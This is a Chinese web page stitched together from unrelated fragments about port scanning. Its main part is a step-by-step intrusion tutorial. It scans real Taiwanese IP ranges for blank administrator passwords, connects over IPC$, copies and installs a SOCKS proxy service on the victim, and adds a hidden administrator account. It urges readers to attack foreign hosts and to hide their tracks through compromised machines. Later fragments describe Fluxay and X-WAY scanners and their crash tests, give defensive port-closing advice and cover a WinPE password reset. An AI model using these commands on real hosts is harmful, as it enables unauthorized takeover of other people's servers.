扫描端口有什么用-fluxay端口扫描

端口扫描、跳板的详细教程！

特别提醒：千万不要做国内的主机啊！做日本或者阿扁（台湾）吧，这样既不违反 我们国家的法律，也体现了自己的爱国心，哈哈（摘录别人的话），不过最好还是老老实实的做跳板，不要总是去想着做什么坏事。 千万不要用国内的主机做试验啊，否则等着警车来接你啦 怎样制作代理跳板 说明：（1）这篇文章是我自己做跳板的一点体会，是些给那些从来没有做过跳板的网友看的。做过跳板的网友就不用看了。 （2）本文讲述的是做跳板最简单，最基础的方法，仅仅是给新手提供一个思路，一些稍微复杂的方法比如unicode，CGI等等这里不讲。 （3）做跳板毕竟算是一种入侵行为，有了跳板和肉鸡以后，千万要用在该用的地方，不要刻意去“黑“别人啊！！ 准备工作： 做一件事情，至少需要两个方面的准备工作：相关的基础知识和做这件事情的工具。 基本的工具：（1）x-scan v1.3：强大的漏洞扫描工具，对于初学者来说非常好的一个工具。我们主要用他来扫描一些基本的漏洞（主要是NT弱密码），用法在后面会具体说。（其实流光很不错的，但是我觉得流光再扫NT弱密码的时候太烦了） （2）superscan：非常快速的端口扫描工具，可以在很短的时间里发现某个IP域上IP的分布。为什么用他呢？主要是避免盲目扫描，提高效率：某个 IP域上IP地址的分布不是连续的，也许他从xxx.xxx.0.0-xxx.xxx.50.255上每个IP都是有计算机存在的，而从 xxx.xxx.51.0- xxx.xxx.100.255每个IP都没有计算机存在。如果你事先不知道这一段上根本没有主机的话，花了很长时间去扫描也不会有结果,浪费时间和金钱 啊。 （3）fluxay 4.0：大名鼎鼎的扫描工具，我们主要用它的NT管道命令功能来连接目标主机，以及添加用户、远程启动服务等。注意了：最好是fluxay 4.0版本。 （4）windows2000下的c:\命令提示符工具：也就是说，跳板的制作至少是要在windows2000以上的操作系统下进行。 （5）sksockserver.exe：做跳板的主角，就是用它来实现远程主机的socks5代理功能的。 （6）全球IP地址分配表：这个对于高手来说是不必要的，用他的目的是考虑到很多以前没有做过跳板的网友对IP的分布不了解，我们主要的目标还是国外的主 机，因此对国外的IP分布有一些了解是很重要的，也是以后我们选定所要扫描的IP域的主要根据。这样的话，就省得再去用“追捕”软件查找IP的实际所在地 了。 好了工具准备完了，现在了解一下做跳板的大概过程。 注意：刚才你下载的这些东东不是放在你的硬盘上！放在什么地方呢？放在“肉鸡”上！ 就是说我们做跳板的过程是在肉鸡上完成的。 名词解释肉鸡：肉鸡是开了3389端口微软终端服务（microsoft terminal service），又有弱密码的高速服务器，俗称“肉鸡”。我们之所以要在肉鸡上做，是出于安全考虑，因为做跳板毕竟是一种非法入侵行为，我们需要隐藏自 己的踪迹，当然，不想用肉鸡也可以，前提是你有足够的带宽，而且不怕公安上门找你麻烦。（当然，进入肉鸡本身也是一种非法的入侵）。我们用 mstsc.exe这个软件登陆上肉鸡，就可以像平时我们在自己电脑上一样用鼠标控制远程的服务器（也就是肉鸡）做我们要做的事情。 过程：为了叙述的方便，先假设我们已经有了一个肉鸡。下面的步骤没有特殊说明都是在“肉 鸡”上完成的。 （1） 先在自己的机器上打开全球IP地址分配表，选取一个IP区域 （2） 登陆上肉鸡，把刚才说到的工具在肉鸡上下载好，就用肉鸡自己的IE下载就行了。 （3） 主要的过程是：先用superscan扫描（1）选定的IP区域，找到其中一个IP很集中的区域，然后放到x-scan进行漏洞扫描（因为是面对以前没有 做过跳板的网友，所以这里只介绍用NT弱密码制作跳板），找到若干个有弱密码的IP，把sksockserver.exe上传到目标主机上，然后远程启动 sksockserver。这样，跳板就做好了。 我们一起来实践一下，做一个跳板： （1） 刚才说过了，没有肉鸡做跳板是不行的，尤其是拨号上网的网友（速度慢）。我们首先登陆上一个已经知道的肉鸡：xxx.xxx.xxx.xxx。帮刚才上面 提到的东东都准备好。最好是集中放置，这样便于我们使用。不要到处乱放，否则主人一进来就知道有人进过他的机器。 （2） 我们选择210.85.0.0-210.85.50.255这一段IP（台湾），放在superscan里面去，把superscan的端口设置改成只有 80一个端口，然后确定，开始扫描。这时，在下面的输出框里面，就会出现一大批的活跃IP，看见了吗？210.85.0.0-210.85.40.255 这一段上都是活跃的IP。现在我们随便选一个IP区域，比如我们就选210.85.0.0-210.85.5.255这一段，不要太长，因为下一步我们要 把他们放进x-scan进行扫描，x-scan扫描速度并不是很快，太多的话，会降低效率，而且IP区域过长的话，有可能使x-scan出现误报。 x-scan的使用方法这里就不详细叙述了这里要做的就是：在“设置”菜单里，先选“扫描模块”，选择“开放端口”和“NT弱密码”两个选项，在“扫描参 数”里，填上我们刚才选定的IP范围：210.85.0.0-210.85.5.255，接着，在其中“端口相关设置”里，把原先一长串的端口去掉，只填 上80，3389两个端口，其他的设置就用默认的好了，不用再改了。然后就开始搜索，这需要大概你8、9分钟的时间（因为x-scan虽然简单，但是速度慢），这段时间你大可以做一点自己的其他事情，等时间差不多了，你再看看x-scan里面的结果：好的，N个机器的密码为空，这下子有收获了！但是要说的 是，x-scan有一些误报，大家一定要有耐心去试啊！ （3） 我们随便从中间随便选了一个，比如：210.85.0.14：administrator 空。接下来的事情， 是要验证它到底接不接受我们的连接，密码是不是正确。现在用到流光了，打开流光，选择“工具”里面的“ＮＴ管道远程命令”，出现对话框，把刚才的ＩＰ，用户名，密码填进去，然后回车。在界面上“ＮＴＣＭＤ”提示符后面打入ＣＭＤ，连接成功，屏幕上出现了“Ｃ：\ＷＩＮＮＴ\ ＳＹＳＴＥＭ３２”的提示符。这证明，刚才的用户名和密码是正确的，这台机器已经基本是你的了。好了，我们进去了，想想我们要做什么呢？对了，是做跳板，我们还要把sksockserver.exe放到210.85.0.14上，这样才能启动服务，让这台机器做为跳板！怎么把这个东东放上去呢： 调出肉鸡上的ＣＭＤ，在命令提示符下按下面的方法做： c:\net use \\210.85.0.14\ipc$ “”/user:“administrator”（建立IPC连接） 系统提示：命令成功完成。 Copy c:\sksockserver.exe \\210.85.0.14\admin$ 系统提示：成功复制一个文件。 这样我们就成功地把sksockserver.exe传到了目标主机上。接下来的任务就是把他远程启动就行了。 我们又回到刚才流光的NTCMD里，在提示符下按下面的方法做： c:\sksockserver –install 系统提示：snake sockproxy service installed c:\sksockserver –config port 1949（端口自己来定，这里的1949是随便选的） 系统提示：the port value have set to 1949 c:\sksockserver –config starttype 2 系统提示：the starttype have set to 2---auto c:\net start skserver 系统提示服务启动成功。 这个时候，这台机器已经成为你的跳板了。 下面简单的说一说自己找肉鸡的方法。 工具：（1）sockscap：强大的socks代理调度软件。 （2）snake的代理跳板GUI（图形界面程序） （3）mstsc：微软terminal service终端服务的客户端程序。用于登陆3389肉 鸡。有了它，我们就可以象控制自己的机器一样控制终端服务器，做我们的事情了。 其实前面两个都是附属的工具，只有mstsc才是真正唱主角的。 Sockscap和sksockserver GUI配合实现实现跳板的使用，可以隐藏我们的 入侵痕迹。 我们现在还没有肉鸡，那么一切事情都只能在我们自己的机器上做了，如果你不放心的话 可以到网吧去做下面的事情。 但是，要提醒的是，千万不要做国内的主机啊！做日本或者阿扁（台湾）吧，这样既不违反 我们国家的法律，也体现了自己的爱国心，哈哈（摘录别人的话），不过最好还是老老实实 的做跳板，不要总是去想着做什么坏事。 步骤其实跟做跳板也很相似的。刚才我们在x-scan搜索的端口里设置了3389，如果一台机 器开了3389端口，而且有了弱密码的话，那这样的机器就是所谓的“肉鸡”了。（当然输入 法漏洞有的时候也可以做成肉鸡，但是毕竟现在有输入法漏洞的机器太少了，远远不及有弱 密码的终端服务器那么多，所以我们还是选择了后者，而且输入法漏洞只适合国内机器。一 个一个去试验，真是太浪费时间了！会烦死的。） 具体搜索过程跟刚才在作跳板里是一样的，找到一个开了3389端口服务，而且有弱密码的 机器。我们在上面搜索的结果中仔细地看看，终于发现了一台：210.85.2.84:frank41:空。而 且开了3389服务。要把这台机器变成自己地机器那肯定要有自己的登录名，否则每次总是 用别人的，那还怎么叫是自己的机器？我们现在来为自己添加一个用户名，把自己提升成为 root权限，那么我们就可以做任何事情了。打开流光，选择“工具”里面的“NT管道命令” 填上刚才得到的用户名跟密码：frank41：空。然后确定，进入NTCMD界面，在提示符下 键入:CMD,连接成功以后在系统提示符下如下操作： c:\net user admin /add（添加一个admin用户） c:\net user admin shonline788（使得admin的密码是shonline788） c:\net localgroup administrators admin /add（把用户admin提升为administrator即管理员身份） 这样我们就成功的在这台机器中取得了root权限，可以作任何事情了，但是别做坏事噢。 下一步，就要用上我们刚才准备的这些工具了。在网上搞几个socks代理，把sockscap和 sksockserverGUI设置好，把mstsc的图标拖到sockscap里去，双击mstsc的图标，在其中填 上你刚才找到的肉鸡IP：210.85.2.84,然后回车进行连接。成功以后，会出现一个跟我们平 时登陆windows2000时候一样的一个蓝色的界面，在里面填上我们刚才添加的用户名和密 码，回车登陆。登陆成功以后就会出现该主机的图形界面，这个时候你就可以象操作自己的 机器一样，操作别人的机器。至此，你已经获得了一台肉鸡。就可以做我们上面做过的事情 了。

请众位大虾介绍点流光和冰河的使用说明--------另外冰河的版本哪个好-跪求

黑客攻防实战详解

流光Fluxay

1．流光简介

流光界面如图2-68所示，它是小榕的作品。这个软件能让一个刚刚会用鼠标的人成为专业级黑客。它可以探测POP3、FTP、HTTP、Proxy、Form、SQL、SMTP、IPC$等各种漏洞，并针对各种漏洞设计了不同的破解方案，能够在有漏洞的系统上轻易得到被探测的用户密码。流光对Windows 9x/NT/2000/2003上的漏洞都可以探测，使它成为许多黑客手中的必备工具之一，一些资深黑客也对它青睐有加。更值得一提的是，通过流光独创的Sensor工具，只需要简单的几步操作便可以实现第三方代理扫描。

虽然到目前为止，流光已经推出了5.0版本。但是，考虑到5.0版本仍不稳定，所以本书仍然以流光4.7进行介绍。

2．流光功能概述

流光这款软件除了能够像X-Scan那样扫描众多漏洞、弱口令外，还集成了常用的入侵工具，如字典工具、NT/IIS工具等，还独创了能够控制“肉鸡”进行扫描的“流光Sensor工具”和为“肉鸡”安装服务的“种植者”工具。

3．关于流光的一些补充

与X-Scan相比，流光的功能多一些，但操作起来难免繁杂。由于流光的功能过于强大，而且功能还在不断扩充中，因此流光的作者小榕限制了流光所能扫描的IP范围，不允许流光扫描国内IP地址，而且流光测试版在功能上也有一定的限制。但是，入侵者为了能够最大限度地使用流光，在使用流光之前，都需要用专门的破解程序对流光进行破解，去除IP范围和功能上的限制。

安装与打补丁完成后，打开流光，界面如图2-69所示。

图2-68 图2-69

4．实例：使用流光高级扫描功能检测210.□.□.2到210.□.□.253网段主机的系统缺陷

打开高级扫描向导、设置扫描参数。

在流光4.7主界面下，通过选择“文件（F）”-“高级扫描向导（W）”或使用快捷健“Ctrl+W”打开高级扫描向导。在“起始地址”和“结束地址”分别填入目标网段主机的开始和结束IP地址；在“目标系统”中选择预检测的操作系统类型；在“获取主机名”、“PING检查”前面打勾；在“检测项目”中，选择“全选”；选好后如图2-70所示。

然后单击“下一步（N）”按钮，在图2-71中选中“标准端口扫描”。

说明：

“标准端口扫描”：只对常见的端口进行扫描。

“自定端口扫描范围”：自定义端口范围进行扫描。

然后单击“下一步（N）”按钮，在图2-72中进行设置。

图2-70 图2-71

设置好所有检测项目后，然后单击“下一步（N）”按钮来到如图2-73所示的界面，选择“本地主机”，表示使用本机执行扫描任务。

图2-72 图2-73

开始扫描。

在图2-73中单击“开始（S）”按钮进行扫描。在扫描过程中，如果想要停止，通过单击最下角的“取消”按钮来实现，不过需要相当一段时间才能真正的停止，所以建议一次不要扫太大的网段，如果因扫描时间过长而等不及，这时候再想让流光停下来是不容易的。

查看扫描报告。

扫描结束后，流光会自动打开HTML格式的扫描报告，如图2-74所示。

图2-74

需要指出的是，在扫描完成后，流光不仅把扫描结果整理成报告文件，而且还把可利用的主机列在流光界面的最下方，如图2-75所示。

图2-75

单击主机列表中的主机便可以直接对目标主机进行连接操作，如图2-76所示。

除了使用“高级扫描向导”配置高级扫描外，还可以直接选取高级扫描工具，如图2-77所示。

图2-76 图2-77

打开“高级扫描设置”，其界面如图2-78所示。

图2-78

关于流光的使用就介绍到这里，本节中所介绍的只是流光功能的一小部分，其他一些功能会在以后的实例中逐一介绍。流光扫描器自身的设置是比较复杂的，有很多选项可以自由设定，因而也给了使用者更大的发挥空间，可以根据网络和机器的状况来尝试改变这些设置，提高扫描器的性能。另外，流光中还有详细的FAQ问题解答供用户参考。

2.4.3 X-WAY

1．X-WAY简介

X-WAY是一款非常不错的综合扫描器，而且是免费软件、简单易用、功能强大，自带猜解机、嗅探器及一些入侵工具。这款扫描器功能很全面，最大的特点是支持代理扫描，可通过Socks5代理进行端口扫描和复杂的二级代理跳转扫描。

2．界面如图2-79所示

图2-79

3．功能说明（引自X-WAY使用说明）

① 高级扫描：对系统进行综合扫描，包括对主机信息收集，漏洞扫描，弱口令探测等，如图2-80所示。

② 主机搜索：用来对主机进行简单扫描来发现符合条件的主机，如图2-81所示。

图2-80 图2-81

③ 查询器，如图2-82所示。

图2-82

è DNS查询：可对域名进行IP转换，和IP到主机之间转换。

è 时间查询：对有开启时间服务的服务器进行时间查询。

è 地址查询：对IP的地理位置进行查询。

è 我的IP：查询本机的IP。

è Finger：对对方主机进行Finger用户查询。

è NT时间：对可进行空连接的NT主机进行时间查询。

④ 猜解机，如图2-83所示。

è 协议类型：包括对FTP、POP、共享资源和SQL的猜解、2.0版本开始增加了对Socks5和HTTP（某些网页需要验证才能进去）主机的猜解，而SQL猜解必须本机装了MS SQL才能有效。

è 线程数；根据自己的网络速度进行调制。

è 猜解配置：三种穷举方法（字典法，广度算法穷举自定义字符组合和固定字符组合），建议选用好的字典。

⑤ 黑匣子，如图2-84所示。

图2-83 图2-84

è NUKE测试：向Windows 98/98SE发送IGMP包测试，结果会导致攻击目标系统蓝屏，机器重启等。

è OOB测试：Windows 95，NT的OOB漏洞测试，会导致攻击蓝屏，系统重启等。

è MS SQL测试：向SQL Server发连续0字节进行DDoS漏洞测试，有漏洞则会产生拒绝服务。

è SMTP测试：测试SMTP主机漏洞。

è PLUGIN测试：对指定端口发超长数据，企图使缓冲区溢出，以达到攻击目的。

⑥ 嗅探器。

嗅探器能自动截取主机所在网络的数据包，从而做到窃听。如果数据包没有被加密传输的话，那么后果将不堪设想，但嗅探器只适用于“广播网络”，如“集线器”（HUB）为中心的组网。但是，令人担忧的是，绝大多数局域网都属于“广播”网络，并且由于嗅探器属于被动式的窃听，所以即使是再安全的计算机，只要处在广播网络中，就可以被嗅探到。

关于X-WAY的详细使用方法，请查阅X-WAY自带的使用说明，打开方法如图2-85所示。

高手进！！！！不会勿答

关闭闲置端口、屏蔽危险端口

黑客的探测方式里除了侦察IP，还有一项——端口扫描。通过“端口扫描”可以知道被扫描的计算机哪些服务、端口是打开而没有被使用的(可以理解为寻找通往计算机的通道)。

一、端口扫描

网上很容易找到远程端口扫描的工具，如Superscan、IP Scanner、Fluxay(流光)等(

。从端口扫描结果中我们可以清楚地了解，该主机的哪些非常用端口是打开的；是否支持FTP、Web服务；且FTP服务是否支持“匿名”，以及IIS版本，是否有可以被成功攻破的IIS漏洞也显示出来。

二、阻止端口扫描

防范端口扫描的方法有两个：

1.关闭闲置和有潜在危险的端口

这个方法有些“死板”，它的本质是——将所有用户需要用到的正常计算机端口外的其他端口都关闭掉。因为就黑客而言，所有的端口都可能成为攻击的目标。换句话说“计算机的所有对外通讯的端口都存在潜在的危险”，而一些系统必要的通讯端口，如访问网页需要的HTTP(80端口)；QQ(4000端口)等不能被关闭。

在Windows NT核心系统(Windows 2000/XP/ 2003)中要关闭掉一些闲置端口是比较方便的，可以采用“定向关闭指定服务的端口”和“只开放允许端口的方式”。计算机的一些网络服务会有系统分配默认的端口，将一些闲置的服务关闭掉，其对应的端口也会被关闭了(如图2)。进入“控制面板”、“管理工具”、“服务”项内，关闭掉计算机的一些没有使用的服务(如FTP服务、DNS服务、IIS Admin服务等等)，它们对应的端口也被停用了。至于“只开放允许端口的方式”，可以利用系统的“TCP/IP筛选”功能实现，设置的时候，“只允许”系统的一些基本网络通讯需要的端口即可。

2.检查各端口，有端口扫描的症状时，立即屏蔽该端口

这种预防端口扫描的方式显然用户自己手工是不可能完成的，或者说完成起来相当困难，需要借助软件。这些软件就是我们常用的网络防火墙。

防火墙的工作原理是：首先检查每个到达你的电脑的数据包，在这个包被你机上运行的任何软件看到之前，防火墙有完全的否决权，可以禁止你的电脑接收Internet上的任何东西。当第一个请求建立连接的包被你的电脑回应后，一个“TCP/IP端口”被打开；端口扫描时，对方计算机不断和本地计算机建立连接，并逐渐打开各个服务所对应的“TCP/IP端口”及闲置端口，防火墙经过自带的拦截规则判断，就能够知道对方是否正进行端口扫描，并拦截掉对方发送过来的所有扫描需要的数据包。

现在市面上几乎所有网络防火墙都能够抵御端口扫描，在默认安装后，应该检查一些防火墙所拦截的端口扫描规则是否被选中，否则它会放行端口扫描，而只是在日志中留下信息而已。

怎么对电脑木马的恶意行为进行拦截呢

利用端口扫描工具检测

端口扫描工具如Superscan、X-Scan、Fluxay、Angry IPScanner和NSE等，其主要功能：

1）通过Ping命令查看检验IP是否在线；

2）IP和域名相互转换；

3）检验目标计算机提供的服务类别；

4）检验一定范围目标计算机是否在线和端口情况；

5）工具自定义列表检验目标计算机是否在线和端口情况；

6）自定义要检验的端口，并可以保存为端口列表文件；

7）自带一个木马端口列表trojans.lst，通过这个列表用户可以检测目标计算机是否有木马；同时，也可以自定义修改这个木马端口列表。

2.利用入侵防御系统IPS拦截

入侵防御系统IPS(Intrusion Prevent System)可以监视网络或网络设备的网络资料传输行为，及时的中断、调整或隔离一些不正常或是具有伤害性的网络资料传输行为。IPS也像IDS（入侵检测系统）一样，专门深入网路数据内部，查找它所认识的攻击代码特征，过滤有害数据流，丢弃有害数据包，并进行记载，以便事后分析。更重要的是，大多数IPS结合应用程序或网路传输中的异常情况，辅助识别入侵和攻击。IPS虽然也考虑已知病毒特征，但是它并不仅仅依赖于已知病毒特征。IPS一般作为防火墙和防病毒软件的补充来投入使用。在必要时，还可以为追究攻击者的刑事责任而提供法律上有效的证据 (forensic)。

3.利用统一威胁管理系统

统一威胁管理UTM（Unified ThreatManagement），将防病毒、入侵检测和防火墙安全设备划归统一威胁管理。IDC将防病毒、防火墙和入侵检测等概念融合到被称为统一威胁管理的新类别中，该概念引起了业界的广泛重视， 并推动了以整合式安全设备为代表的市场细分的诞生。目前，混合型攻击成为主流，非法访问、蠕虫病毒、垃圾邮件、带宽滥用等安全威胁不再是单兵作战，而是经常一起进行混合攻击，单一的防护技术已根本无法应对。而在网络特别在广域网中同时部署多个安全产品，除了增加用户安全建设的成本之外，还会造成网络结构复杂，单点故障增多，维护和管理难度成几何级增大。UTM是一种灵活、简洁、全面的安全防护手段，它在一个硬件平台下集成了防火墙、漏洞防护、防病毒、防垃圾邮件、内容过滤等多个安全功能，可以应对快速增长的各种混合攻击。然而目前业界大多数的UTM产品均是在传统防火墙基础上进行简单的功能叠加，一旦多功能开启后，性能急剧下降，造成UTM的多功能成为一个摆设而无法真正使用。

目前，UTM常定义为由硬件、软件和网络技术组成的具有专门用途的设备，它主要提供一项或多项安全功能，同时将多种安全特性集成于一个硬件设备里，形成标准的统一威胁管理平台。UTM设备应该具备的基本功能包括网络防火墙、网络入侵检测与防御和网关防病毒功能。

拓展阅读：网络安全实用技术，清华大学出版社

流光扫描问题！

自动退出与可能是对方为反击类防火墙，向你的扫描端口发送大量数据导致你流光关闭，比较正常

远程破解Win2003系统登陆密码的方法

1、下载可启动的WinPE镜像（在文章底部，小编会提供一个可启动的ISO格式的PE光盘镜像）。

2、下载UltraISO，并用它打开镜像，把要制作启动盘的U盘插上（备份好数据，因为制作过程需要格式化U盘。）

3、菜单--启动-写入硬盘镜像：

4、看图示，然后写入。

5、写入完毕之后，U盘就是有USB-HDD模式启动功能的启动U盘了。现在，将U盘插到需要破解密码的服务器上，在服务器BIOS里面设置第一启动设备为USB-HDD，然后，服务器将进入到PE操作系统，界面如下：

6、先点“打开”，选中需要修改密码的账户，然后“更改口令”，“保存更改”，完成。（如果账户为禁用状态，“解锁”一下即可。）重启服务器，用新设置的密码登陆。